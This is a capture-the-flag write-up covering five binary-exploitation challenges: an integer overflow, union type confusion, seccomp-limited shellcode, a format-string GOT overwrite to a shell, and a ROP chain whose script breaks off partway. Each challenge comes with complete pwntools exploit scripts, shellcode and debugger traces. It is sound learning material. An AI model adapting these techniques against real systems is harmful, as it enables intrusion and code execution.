# Pwn

[[_TOC_]]

## Pumpkin Stand

```console
opcode@parrot$ file pumpkin_stand
pumpkin_stand: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fbbc6afe5dc2e791b38dfc19dbce5ab57c4a915e, not stripped
```

checksec:
```console
opcode@parrot$ checksec pumpkin_stand
[*] '/mnt/hgfs/Opcode/HTB/pwn_pumpkin_stand/pumpkin_stand'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'./glibc/'
```

Ghidra pseudocode:
```c
void main(void)

{
  short item;
  short amount;
  FILE *flag_fd;
  char flag [48];
  
  setup();
  banner();
  item = 0;
  amount = 0;
  while( true ) {
    while( true ) {
      while( true ) {
         while( true ) {
           menu();
           __isoc99_scanf("%d",&item);
           printf("\nHow many do you want?\n\n>> ");
           __isoc99_scanf("%d",&amount);
           if (0 < amount) break;
           printf("%s\n[-] You cannot buy less than 1!\n","\x1b[1;31m");
         }
         pumpcoins = pumpcoins - amount * (short)(&values)[(int)item];
         if (-1 < pumpcoins) break;
         printf("\nCurrent pumpcoins: [%s%d%s]\n\n","\x1b[1;33m",(ulong)(uint)(int)pumpcoins);
         printf("%s\n[-] Not enough pumpcoins for this!\n\n%s","\x1b[1;31m","\x1b[1;34m");
      }
      if (item != 1) break;
      printf("\nCurrent pumpcoins: [%s%d%s]\n\n","\x1b[1;33m",(ulong)(uint)(int)pumpcoins);
      puts("\nGood luck crafting this huge pumpkin with a shovel!\n");
    }
    if (9998 < pumpcoins) break;
    printf("%s\n[-] Not enough pumpcoins for this!\n\n%s","\x1b[1;31m","\x1b[1;34m");
  }
  flag._0_8_ = 0;
  flag._8_8_ = 0;
  flag._16_8_ = 0;
  flag._24_8_ = 0;
  flag._32_8_ = 0;
  flag._40_8_ = 0;
  flag_fd = fopen("./flag.txt","rb");
  if (flag_fd != (FILE *)0x0) {
    fgets(flag,48,flag_fd);
    printf("%s\nCongratulations, here is the code to get your laser:\n\n%s\n\n","\x1b[1;32m",flag);
    exit(22);
  }
  puts("Error opening flag.txt, please contact an Administrator!\n");
  exit(1);
}
```

You originally have 1337 pumpcoins and can either buy shovel or laser, worth 1337 and 9999 pumpcoins respectively.  
It makes sure that you cannot buy negative amount of items, but it is possible to select items with negative indices. `values` is likely an array which contains 1337 and 9999 at index 1 and 2 respectively. Accessing negative elements from this array would give a garbage value from the memory.

The type of `pumpcoins` is `short int`, it consumes 8 bits of memory and can only have values in the range -32768 to +32767  
If you manage to set the value of pumpcoins to less than -32768, it would wrap around and become a large positive integer  
This vulnerability is called Integer Overflow.

![1](images/1.png)

Using item index -1 and quantity 2, I get the flag:
```
HTB{1nt3g3R_0v3rfl0w_101_0r_0v3R_9000!}
```

## Entity

I spent a lot of time on this challenge, only to realise how trivial it was.  

```console
opcode@parrot$ file entity                                                    
entity: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=021fdb309f6c542e5879cc8f8baf4d3490c4964a, for GNU/Linux 3.2.0, not stripped
```

checksec:
```console
opcode@parrot$ checksec entity       
[*] '/mnt/hgfs/Opcode/HTB/pwn_entity/entity'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
```

The source code was provided for this challenge.  
Find it here: [entity.c](entity.c)

There is a `get_flag` function:
```c
void get_flag() {
    if (DataStore.integer == 13371337) {
        system("cat flag.txt");
        exit(0);
    } else {
        puts("\nSorry, this will not work!");
    }
}
```
It is accessible, but `DataStore.integer` needs to be set to `13371337`  

But the function to set the value of `DataStore` does not allow it to be the integer `13371337`:
```c
void set_field(field_t f) {
    char buf[32] = {0};
    printf("\nMaybe try a ritual?\n\n>> ");
    fgets(buf, sizeof(buf), stdin);
    switch (f) {
    case INTEGER:
        sscanf(buf, "%llu", &DataStore.integer);
        if (DataStore.integer == 13371337) {
            puts("\nWhat's this nonsense?!");
            exit(-1);
        }
        break;
    case STRING:
        memcpy(DataStore.string, buf, sizeof(DataStore.string));
        break;
    }
}
```

But the vulnerability lies with the data type of `DataStore`:
```c
static union {
    unsigned long long integer;
    char string[8];
} DataStore;
```
Union is a special data type available in C that allows storing different data types within the same position in the memory. A union can be defined with multiple members, but it can only store one value at any given time.  
It means that we can modify `DataStore.string` to the string equivalent of `13371337` and the check would consider it `DataStore.integer` and give us the flag

So, I wrote a C program to observe how the representation of data in memory differs for `int` vs `string`
```c
#include <stdio.h>

static union {
    unsigned long long integer;
    char string[8];
} DataStore;


int main()
{
	char buf[32] = {0};

	printf("%s", "Integer: ");
	fgets(buf, sizeof(buf), stdin);

	sscanf(buf, "%llu", &DataStore.integer);
	printf("%.8s\n", DataStore.string);

	return 0;
}
```

But after running the program, I ran into this:

![2](images/2.png)

The required string is not something that can be easily printed.  
So I added another couple lines:
```c
#include <stdio.h>

static union {
    unsigned long long integer;
    char string[8];
} DataStore;


int main()
{
	char buf[32] = {0};

  char *ptr = (void *)&DataStore;
  printf("Memory address of Datastore: %p\n", ptr);

	printf("%s", "Integer: ");
	fgets(buf, sizeof(buf), stdin);

	sscanf(buf, "%llu", &DataStore.integer);
	printf("%.8s\n", DataStore.string);

	return 0;
}
```
Now, it would print the memory address of DataStore, and I should be able to observe it with gdb:
```console
opcode@parrot$ gdb ./test
```

```
gef➤  disass main
Dump of assembler code for function main:
   0x0000000000001155 <+0>:	push   rbp
   0x0000000000001156 <+1>:	mov    rbp,rsp
   0x0000000000001159 <+4>:	sub    rsp,0x30
   0x000000000000115d <+8>:	mov    QWORD PTR [rbp-0x30],0x0
   0x0000000000001165 <+16>:	mov    QWORD PTR [rbp-0x28],0x0
   0x000000000000116d <+24>:	mov    QWORD PTR [rbp-0x20],0x0
   0x0000000000001175 <+32>:	mov    QWORD PTR [rbp-0x18],0x0
   0x000000000000117d <+40>:	lea    rax,[rip+0x2ecc]        # 0x4050 <DataStore>
   0x0000000000001184 <+47>:	mov    QWORD PTR [rbp-0x8],rax
   0x0000000000001188 <+51>:	mov    rax,QWORD PTR [rbp-0x8]
   0x000000000000118c <+55>:	mov    rsi,rax
   0x000000000000118f <+58>:	lea    rdi,[rip+0xe72]        # 0x2008
   0x0000000000001196 <+65>:	mov    eax,0x0
   0x000000000000119b <+70>:	call   0x1030 <printf@plt>
   0x00000000000011a0 <+75>:	lea    rsi,[rip+0xe82]        # 0x2029
   0x00000000000011a7 <+82>:	lea    rdi,[rip+0xe85]        # 0x2033
   0x00000000000011ae <+89>:	mov    eax,0x0
   0x00000000000011b3 <+94>:	call   0x1030 <printf@plt>
   0x00000000000011b8 <+99>:	mov    rdx,QWORD PTR [rip+0x2e81]        # 0x4040 <stdin@GLIBC_2.2.5>
   0x00000000000011bf <+106>:	lea    rax,[rbp-0x30]
   0x00000000000011c3 <+110>:	mov    esi,0x20
   0x00000000000011c8 <+115>:	mov    rdi,rax
   0x00000000000011cb <+118>:	call   0x1040 <fgets@plt>
   0x00000000000011d0 <+123>:	lea    rax,[rbp-0x30]
   0x00000000000011d4 <+127>:	lea    rdx,[rip+0x2e75]        # 0x4050 <DataStore>
   0x00000000000011db <+134>:	lea    rsi,[rip+0xe54]        # 0x2036
   0x00000000000011e2 <+141>:	mov    rdi,rax
   0x00000000000011e5 <+144>:	mov    eax,0x0
   0x00000000000011ea <+149>:	call   0x1050 <__isoc99_sscanf@plt>
   0x00000000000011ef <+154>:	lea    rsi,[rip+0x2e5a]        # 0x4050 <DataStore>
   0x00000000000011f6 <+161>:	lea    rdi,[rip+0xe3e]        # 0x203b
   0x00000000000011fd <+168>:	mov    eax,0x0
   0x0000000000001202 <+173>:	call   0x1030 <printf@plt>
   0x0000000000001207 <+178>:	mov    eax,0x0
   0x000000000000120c <+183>:	leave  
   0x000000000000120d <+184>:	ret    
End of assembler dump.
```

I set two breakpoints: one right after the `printf` call that tells the address of DataStore, and the second one somewhere after `sscanf` call:
```
gef➤  b* main+75
Breakpoint 1 at 0x11a0
gef➤  b* main+173
Breakpoint 2 at 0x1202
```
In gdb, ASLR is disabled by default and it displays the location of `DataStore` as 0x555555558050 every time.
```console
gef➤  r
Starting program: /mnt/hgfs/Opcode/HTB/pwn/Entity/test 

[#0] Id 1, Name: "test", stopped 0x5555555551a0 in main (), reason: BREAKPOINT
──────────────────────────────────────────────────────────────────── trace ────
[#0] 0x5555555551a0 → main()
───────────────────────────────────────────────────────────────────────────────
gef➤  x/g 0x555555558050
0x555555558050 <DataStore>:	0x0000000000000000
```
It's null right now.
```
gef➤  c
Continuing.
Integer: 13371337

[#0] Id 1, Name: "test", stopped 0x555555555202 in main (), reason: BREAKPOINT
──────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555555202 → main()
───────────────────────────────────────────────────────────────────────────────
gef➤  x/g 0x555555558050
0x555555558050 <DataStore>:	0x0000000000cc07c9
```
So, 0x0000000000cc07c9 is the value that we need.  
It's simply hex for 13371337. Of course it is

The final exploit:
```py
from pwn import *

exe = context.binary = ELF('./entity', checksec=False)
# p = process(exe.path)
p = remote('138.68.139.134', 32497)

p.sendlineafter(b'>> ', b'T')
p.sendlineafter(b'>> ', b'S')
p.sendline(p64(13371337))
p.sendlineafter(b'>> ', b'C')
print(p.recvall())
```

You can find it [here](exploit_union.py) as well.

## Pumpking

This is a standard shellcoding challenge where I wrote a custom shellcode to read the flag.  
It was pretty much the same as "Fleet Management" challenge from CyberApocalypse CTF 2022

```console
opcode@parrot$ file pumpking
pumpking: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, BuildID[sha1]=fbd2ae75e4f0a999c62a92360d6a085e30637725, for GNU/Linux 3.2.0, not stripped
```

checksec:
```console
opcode@parrot$ checksec pumpking
[*] '/mnt/hgfs/Opcode/HTB/pwn_pumpking/challenge/pumpking'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
    RUNPATH:  b'./glibc/'
```
The "NX disabled" made me think "shellcode!"

Ghidra pseudocode for `main`:
```c
void main(void)

{
  int check;
  size_t passLen;
  ulong i;
  char passphrase [14];
  
  setup();
  passphrase._0_8_ = 0;
  passphrase._8_4_ = 0;
  passphrase._12_2_ = 0;
  write(1,
         "\nFirst of all, in order to proceed, we need you to whisper the secret passphrase provided  only to naughty kids: "
         ,112);
  read(0,passphrase,14);
  i = 0;
  while( true ) {
    passLen = strlen(passphrase);
    if (passLen <= i) break;
    if (passphrase[i] == '\n') {
      passphrase[i] = '\0';
    }
    i = i + 1;
  }
  check = strncmp(passphrase,"pumpk1ngRulez",13);
  if (check == 0) {
    king();
  }
  else {
    write(1,"\nYou seem too kind for the Pumpking to help you.. I\'m sorry!\n\n",62);
  }
  exit(22);
}
```

Using the passphrase `pumpk1ngRulez` allows us to access the function `king()`:
```c
void king(void)

{
  long in_FS_OFFSET;
  char shellcode [148];
  long canary_;
  
  canary_ = *(long *)(in_FS_OFFSET + 0x28);
  write(1,
         "\n[Pumpkgin]: Welcome naughty kid! This time of the year, I will make your wish come true!  Wish for everything, even for tha flag!\n\n>> "
         ,136);
  shellcode._0_8_ = 0;
  shellcode._8_8_ = 0;
  shellcode._16_8_ = 0;
  shellcode._24_8_ = 0;
  shellcode._32_8_ = 0;
  shellcode._40_8_ = 0;
  shellcode._48_8_ = 0;
  shellcode._56_8_ = 0;
  shellcode._64_8_ = 0;
  shellcode._72_8_ = 0;
  shellcode._80_8_ = 0;
  shellcode._88_8_ = 0;
  shellcode._96_8_ = 0;
  shellcode._104_8_ = 0;
  shellcode._112_8_ = 0;
  shellcode._120_8_ = 0;
  shellcode._128_8_ = 0;
  shellcode._136_8_ = 0;
  shellcode._144_4_ = 0;
  read(0,shellcode,149);
  (*(code *)shellcode)();
  if (canary_ != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
```
It allows us to freely run shellcodes

I also looked at the `setup()` function:
```c
{
  undefined8 ctx;
  long in_FS_OFFSET;
  long canary;
  
  canary = *(long *)(in_FS_OFFSET + 0x28);
  setvbuf(stdin,(char *)0x0,2,0);
  setvbuf(stdout,(char *)0x0,2,0);
  alarm(127);
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,0x101,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,0x3c,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,0xf,0);
  seccomp_load(ctx);
  if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
```

There are some seccomp rules in place. One should just use `seccomp-tools` instead of figuring it out manually.  
But just in case, the syscall numbers here are 0x101, 0, 0x3c, 1 and 0xf referring to `openat`, `read`, `exit`, `write` and `rt_sigreturn` syscalls respectively.  
And that 0x7fff0000 means `SCMP_ACT_ALLOW`; so it is a whitelist.

```console
opcode@parrot$ seccomp-tools dump ./pumpking 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
 0005: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0010
 0006: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0010
 0007: 0x15 0x02 0x00 0x0000000f  if (A == rt_sigreturn) goto 0010
 0008: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0010
 0009: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL
```

These syscalls are enough to read the file containing the flag and write it to stdout.  
As for the shellcode, I opened the `flag.txt` file using `openat` syscall and got its fd. One catch was to use `AT_FDCWD` so that the path is resolved relative to the current working directory.  
Then, I passed the fd to `read` (the fd is likely 3 as 0, 1, 2 are assigned to stdin, stdout and stderr)  
For the buffer in `read` syscall, I used the memory pointed by `rbp` register, as it would stay unchanged for a while.  
For the `write` syscall, I set the fd to 1 (stdout) and used the memory pointed by `rbp` register as buffer for obvious reasons.  
Since the return value of `read` syscall is the count of bytes read, I passed that value to the `rdx` register for `write` syscall  
(Remember that `rax` register stores the return value)

To find the appropriate registers and values, I referred to https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md and wrote C programs similar to this one:
```c
#include <unistd.h>
#include <sys/syscall.h>

int main(void) {
  int fd;
  fd = syscall(SYS_openat, -0x64, "flag.txt", 0);
  syscall(SYS_sendfile, 1, fd, 0, 0x32);
  return 0;
}
```

The final exploit looked like this:
```py
from pwn import *

exe = context.binary = ELF('./pumpking', checksec=False)
context.terminal = ['mate-terminal', '-e']

# p = process(exe.path)
p = remote('206.189.28.99', 32470)

shellcode = asm(f'''
  push 0x0
  mov rdi,{constants.AT_FDCWD}
  mov rax,0x7478742e67616c66
  push rax
  mov rsi,rsp
  xor edx,edx
  mov eax,{constants.SYS_openat}
  syscall

  mov rdi,rax
  mov rsi,rbp
  mov rdx,0x32
  mov eax,{constants.SYS_read}
  syscall

  mov rdx,rax
  mov rdi,1
  mov rsi,rbp
  mov eax,{constants.SYS_write}
  syscall

  mov eax,{constants.SYS_exit}
  syscall
''')

assert len(shellcode) <= 148

p.sendlineafter(b'kids: ', b'pumpk1ngRulez')

# gdb.attach(p, gdbscript='b* king+249')
p.sendline(shellcode)
p.interactive()
```

You can also find it [here](exploit_sc.py)

## Spooky Time

In this one, we were expected to exploit a straightforward format string bug.

```console
opcode@parrot$ file spooky_time        
spooky_time: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, BuildID[sha1]=29a41183e07159f8444eb964aae5ea33d743a20d, for GNU/Linux 3.2.0, not stripped
```

checksec:
```console
opcode@parrot$ checksec spooky_time 
[*] '/mnt/hgfs/Opcode/HTB/pwn_spooky_time/spooky_time'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'./glibc/'
```
The "No RELRO" made me think "GOT overwrite!"

Ghidra pseudocode:
```c
void main(void)

{
  long in_FS_OFFSET;
  char input1 [12];
  char input2 [312];
  long canary;
  
  canary = *(long *)(in_FS_OFFSET + 0x28);
  setup();
  banner();
  puts("It\'s your chance to scare those little kids, say something scary!\n");
  __isoc99_scanf("%11s",input1);
  puts("\nSeriously?? I bet you can do better than ");
  printf(input1);
  puts("\nAnyway, here comes another bunch of kids, let\'s try one more time..");
  puts("\n");
  __isoc99_scanf("%299s",input2);
  puts("\nOk, you are not good with that, do you think that was scary??\n");
  printf(input2);
  puts("Better luck next time!\n");
  if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
```
The two format string bugs in there are very visible.  
If I had to guess, we need to use the first one for leaking the libc and PIE base and the latter for the actual exploit.

So, I wrote a python script to find the leaks:
```py
from pwn import *

exe = context.binary = ELF('./spooky_time', checksec=False)
libc = ELF('glibc/libc.so.6', checksec=False)
context.terminal = ['mate-terminal', '-e']
context.log_level = 'critical'

for i in range(60):
	p = process(exe.path)
	# p = remote('161.35.33.243', 31935)

	payload = f'%{i}$p'
	p.sendlineafter(b'scary!\n\n', payload.encode())
	leak = p.recv().split(b'\n')[2].decode()
	print(f'index {i}: {leak}')
```

I found that `%3$p` gave a libc leak, `%47$p` leaked the canary and `%51$p` leaked a PIE address  
(The libc addresses start with 0x7f and the PIE addresses start with 0x55 or 0x56 usually)  
(The canary is full 8 bytes, and ends with 00)

With ASLR and PIE out of the way, the real exploitation starts.  
Using:
```
p.sendlineafter(b'time..\n\n\n', b'AAAABBBB%p.%p.%p.%p.%p.%p.%p.%p.%p.%p')
```
I found that the 8th one was reflecting the start of this input

Since a `puts` call is made after the vulnerable `printf`, it is a viable strategy to overwrite the GOT address of `puts` with a suitable `one_gadget` to get a shell:
```console
opcode@parrot$ one_gadget libc.so.6
0x50a37 posix_spawn(rsp+0x1c, "/bin/sh", 0, rbp, rsp+0x60, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL
  rbp == NULL || (u16)[rbp] == NULL

0xebcf1 execve("/bin/sh", r10, [rbp-0x70])
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xebcf5 execve("/bin/sh", r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL
  [rdx] == NULL || rdx == NULL

0xebcf8 execve("/bin/sh", rsi, rdx)
constraints:
  address rbp-0x78 is writable
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
```
It took a bit of trial and error to find the `one_gadget` that worked.

`pwntools` has `fmtstr_payload` which makes this exploit really simple.  
The final exploit:
```py
from pwn import *

exe = context.binary = ELF('./spooky_time', checksec=False)
libc = ELF('glibc/libc.so.6', checksec=False)
context.terminal = ['mate-terminal', '-e']

# p = process(exe.path)
p = remote('161.35.33.243', 31935)

p.sendlineafter(b'scary!\n\n', b'%3$p.%51$p')
p.recv()
leak = p.recv().split(b'\n')[0]

libc_leak, pie_leak = leak.split(b'.')
pie_base = int(pie_leak, 16) - 0x13c0
libc_base = int(libc_leak, 16) - 0x114a37

log.info(f'{hex(pie_base) = }')
log.info(f'{hex(libc_base) = }')

exe.address = pie_base
libc.address = libc_base

# fini_array = exe.get_section_by_name('.fini_array')['sh_addr']
puts_got = exe.got['puts']
log.info(f'{hex(puts_got) = }')

one_gadget = libc_base + 0xebcf5
log.info(f'{hex(one_gadget) = }')

payload = fmtstr_payload(8, {puts_got : one_gadget}, 0, write_size='short')

# gdb.attach(p, gdbscript='b* main+225')
# pause()

p.sendline(payload)
p.interactive()
```

Note that I put lots of `log.info()` in my code. It was for debugging purposes, but I ended up not using them.  
The idea is that you set a breakpoint after your payload has been sent, and use gdb to debug the overwrite.  
For example, if I see:
```
[*] hex(puts_got) = '0x55f9a998eda0'
[*] hex(one_gadget) = '0x7f6622f9ccf5'
```
After the breakpoint is hit, I would run `x/g 0x55f9a998eda0` in gdb and verify that the value there is indeed `0x7f6622f9ccf5`  
If it is not the same, I'd calculate the offset and adjust my payload accordingly.

The final exploit can also be found [here](exploit_fmtstr.py)

## Finale

I was unable to solve it during the CTF, but I found how to get past the issues I faced, thanks to exploit scripts posted by others.  

```console
opcode@parrot$ file finale     
finale: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ac92ca00b198dcf7287937f5ce21c1123a5a549e, for GNU/Linux 3.2.0, not stripped
```

checksec:
```console
opcode@parrot$ checksec finale
[*] '/mnt/hgfs/Opcode/HTB/pwn_finale/finale'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
Oddly enough, canary and PIE are disabled

We also have a `README.md` that says:
```
Remote server is using a custom libc, trying to find the right libc is not intended. We suggest you avoid using techniques based on libc for this challenge.
```

Ghidra psedocode:  
`main`:
```c
int main(void)

{
  int fd;
  char input [16];
  char random [8];
  ulong i;
  
  banner();
  random = 0;
  fd = open("/dev/urandom",0);
  read(fd,random,8);
  printf("\n[Strange man in mask screams some nonsense]: %s\n\n",random);
  close(fd);
  input._0_8_ = 0;
  input._8_8_ = 0;
  printf("[Strange man in mask]: In order to proceed, tell us the secret phrase: ");
  __isoc99_scanf("%16s",input);
  i = 0;
  do {
    if (14 < i) {
LAB_00401588:
      fd = strncmp(input,"s34s0nf1n4l3b00",15);
      if (fd == 0) {
         finale();
      }
      else {
         printf("%s\n[Strange man in mask]: Sorry, you are not allowed to enter here!\n\n",
                &DAT_00402020);
      }
      return 0;
    }
    if (input[i] == '\n') {
      input[i] = '\0';
      goto LAB_00401588;
    }
    i = i + 1;
  } while( true );
}
```
Using `s34s0nf1n4l3b00` when asked for input should get us to the function `finale()`

`finale`:
```c
void finale(void)

{
  char buffer [64];
  
  printf("\n[Strange man in mask]: Season finale is here! Take this souvenir with you for good luck:  [%p]"
          ,buffer);
  printf("\n\n[Strange man in mask]: Now, tell us a wish for next year: ");
  fflush(stdin);
  fflush(stdout);
  read(0,buffer,0x1000);
  write(1,"\n[Strange man in mask]: That\'s a nice wish! Let the Spooktober Spirit be with you!\n\n"
         ,0x54);
  return;
}
```

There is a clear buffer overflow visible.  
There is no PIE or canary on this binary; it should have been really easy to get shell with `one_gadget`  
But that's not intended due to the custom libc

Trying to run it gives an error:
```console
opcode@parrot$ ./finale   
./finale: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./finale)
```

So, I pulled the `libc.so.6` from one of the previous challenges and used `pwninit` to patch this binary to use the libc:
```console
opcode@parrot$ ./pwninit --bin finale --libc libc.so.6
```

I expected to find `syscall` gadget on the binary, but `ROPgadget` did not find anything.  
Since we cannot depend on the libc, the idea for this challenge is to reuse functions from the binary itself to open the flag file, read it, and write it to stdout.  
And thanks to the leak, we know where out payload goes on stack.

Start with finding the offset to instruction pointer:
```console
opcode@parrot$ gdb ./finale_patched
```

```
gef➤  disass finale
Dump of assembler code for function finale:
   0x0000000000401407 <+0>: endbr64 
   0x000000000040140b <+4>: push   rbp
   0x000000000040140c <+5>: mov    rbp,rsp
   0x000000000040140f <+8>: sub    rsp,0x40
   0x0000000000401413 <+12>:    lea    rax,[rbp-0x40]
   0x0000000000401417 <+16>:    mov    rsi,rax
   0x000000000040141a <+19>:    lea    rax,[rip+0x13ef]        # 0x402810
   0x0000000000401421 <+26>:    mov    rdi,rax
   0x0000000000401424 <+29>:    mov    eax,0x0
   0x0000000000401429 <+34>:    call   0x401140 <printf@plt>
   0x000000000040142e <+39>:    lea    rax,[rip+0x143b]        # 0x402870
   0x0000000000401435 <+46>:    mov    rdi,rax
   0x0000000000401438 <+49>:    mov    eax,0x0
   0x000000000040143d <+54>:    call   0x401140 <printf@plt>
   0x0000000000401442 <+59>:    mov    rax,QWORD PTR [rip+0x2bd7]        # 0x404020 <stdin@GLIBC_2.2.5>
   0x0000000000401449 <+66>:    mov    rdi,rax
   0x000000000040144c <+69>:    call   0x4011a0 <fflush@plt>
   0x0000000000401451 <+74>:    mov    rax,QWORD PTR [rip+0x2bb8]        # 0x404010 <stdout@GLIBC_2.2.5>
   0x0000000000401458 <+81>:    mov    rdi,rax
   0x000000000040145b <+84>:    call   0x4011a0 <fflush@plt>
   0x0000000000401460 <+89>:    lea    rax,[rbp-0x40]
   0x0000000000401464 <+93>:    mov    edx,0x1000
   0x0000000000401469 <+98>:    mov    rsi,rax
   0x000000000040146c <+101>:   mov    edi,0x0
   0x0000000000401471 <+106>:   call   0x401170 <read@plt>
   0x0000000000401476 <+111>:   mov    edx,0x54
   0x000000000040147b <+116>:   lea    rax,[rip+0x142e]        # 0x4028b0
   0x0000000000401482 <+123>:   mov    rsi,rax
   0x0000000000401485 <+126>:   mov    edi,0x1
   0x000000000040148a <+131>:   call   0x401130 <write@plt>
   0x000000000040148f <+136>:   nop
   0x0000000000401490 <+137>:   leave  
   0x0000000000401491 <+138>:   ret    
End of assembler dump.
```
Setting a breakpoint right after the `read`
```
gef➤  b* 0x0000000000401476
Breakpoint 1 at 0x401476
gef➤  r
```

I then typed the password and then `10973731` when asked for input
```
gef➤  search-pattern 10973731
[+] Searching '10973731' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffde80 - 0x7fffffffde8c  →   "10973731\n @" 
gef➤  i f
Stack level 0, frame at 0x7fffffffded0:
 rip = 0x401476 in finale; saved rip = 0x4015ac
 called by frame at 0x7fffffffdf20
 Arglist at 0x7fffffffdec0, args: 
 Locals at 0x7fffffffdec0, Previous frame's sp is 0x7fffffffded0
 Saved registers:
  rbp at 0x7fffffffdec0, rip at 0x7fffffffdec8
```
0x7fffffffdec8-0x7fffffffde80 is 72, which is the offset to instruction pointer.

Firstly, the string `flag.txt`. Since we know the address where our input gets stored in advance, we can just have our payload start with `flag.txt\x00` and use that address for the filename when we call `open`

After that, the `fd` 3 would have our flag, and now we need to make a `read` call. But the issue here is the 3rd argument. The 3rd argument of `read` defines the amount of bytes to read, and for that we need to control the `rdx` register.  
But there are no obvious gadgets.  
We can't use `ret2csu` either:
```console
opcode@parrot$ nm -a finale_patched | grep " t\| T"
00000000004012da T banner
0000000000401230 t deregister_tm_clones
0000000000401220 T _dl_relocate_static_pie
00000000004012a0 t __do_global_dtors_aux
0000000000401407 T finale
00000000004015d4 T _fini
00000000004012d0 t frame_dummy
0000000000401000 T _init
0000000000401492 T main
0000000000401260 t register_tm_clones
00000000004013b6 T setup
00000000004011f0 T _start
```
No `__libc_csu_init` in here.

**Note: I got stuck at this part during the CTF. But thanks to an exploit script from `p0fs#0463`, I realised how to get past this rdx issue**

So instead, we can just look at code to see if `rdx` is being modified somewhere  
In the function `finale`:
```
   0x0000000000401471 <+106>:   call   0x401170 <read@plt>
   0x0000000000401476 <+111>:   mov    edx,0x54
   0x000000000040147b <+116>:   lea    rax,[rip+0x142e]        # 0x4028b0
   0x0000000000401482 <+123>:   mov    rsi,rax
   0x0000000000401485 <+126>:   mov    edi,0x1
   0x000000000040148a <+131>:   call   0x401130 <write@plt>
   0x000000000040148f <+136>:   nop
   0x0000000000401490 <+137>:   leave  
   0x0000000000401491 <+138>:   ret    
```
For the `write` call, `edx` is being set to 0x54. It should work for our cause, as flag size is certainly smaller than that.  
But we would also need to take care of the instructions that come after it.  
Most of those just change the values of registers, but the `leave` is troublesome.  

Leave is pretty much equivalent to `mov rsp, rbp; pop rbp`  
Basically the previous frame's `rbp` is restored and execution resumes for the previous function.  
It is troublesome because `rbp` at that point is a bunch of A's

To fix it, we can set `rbp` such that execution is resumed on our payload exactly where it left. We even have a convenient gadget to control the `rbp` register:
```py
payload += p64(pop_rbp)
payload += p64(leak + len(payload) + 8)
```
Since `leak` leaks the start of payload, we can just add the length of payload so that execution gets resumed at the next instruction in our payload. That `+ 8` ensures that the  `p64(leak + len(payload) + 8)` is included too.

After that we can call `read`, have it read from `fd` 3 and store the result at, say, `leak + 240`  
Finally, we can call `puts` with `leak+240` as `rdi`
With that, we get the flag

The final exploit script:
```py
from pwn import *
from re import findall

exe = context.binary = ELF('./finale_patched', checksec=False)
context.terminal = ['mate-terminal', '-e']
# context.log_level = 'debug'

p = process(exe.path)
# p = remote('161.35.33.243', 31935)

offset = 72

rop = ROP(exe)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
pop_rsi = rop.find_gadget(['pop rsi', 'ret'])[0]
pop_rbp = rop.find_gadget(['pop rbp', 'ret'])[0]
rdx_to_0x54 = next(exe.search(asm('mov edx, 0x54')))

open_plt = exe.symbols['open']
read_plt = exe.symbols['read']
puts_plt = exe.symbols['puts']

p.sendlineafter(b'secret phrase: ', b's34s0nf1n4l3b00')
leak = p.recv()
leak = findall(rb'\[.+?\]', leak)[1]
leak = int(leak.strip(b'[]'), 16)
log.info(f'{hex(leak) = }')

payload = b'flag.txt\x00'
payload += b'A' * ( 72 - len(payload) )
###################### open ######################
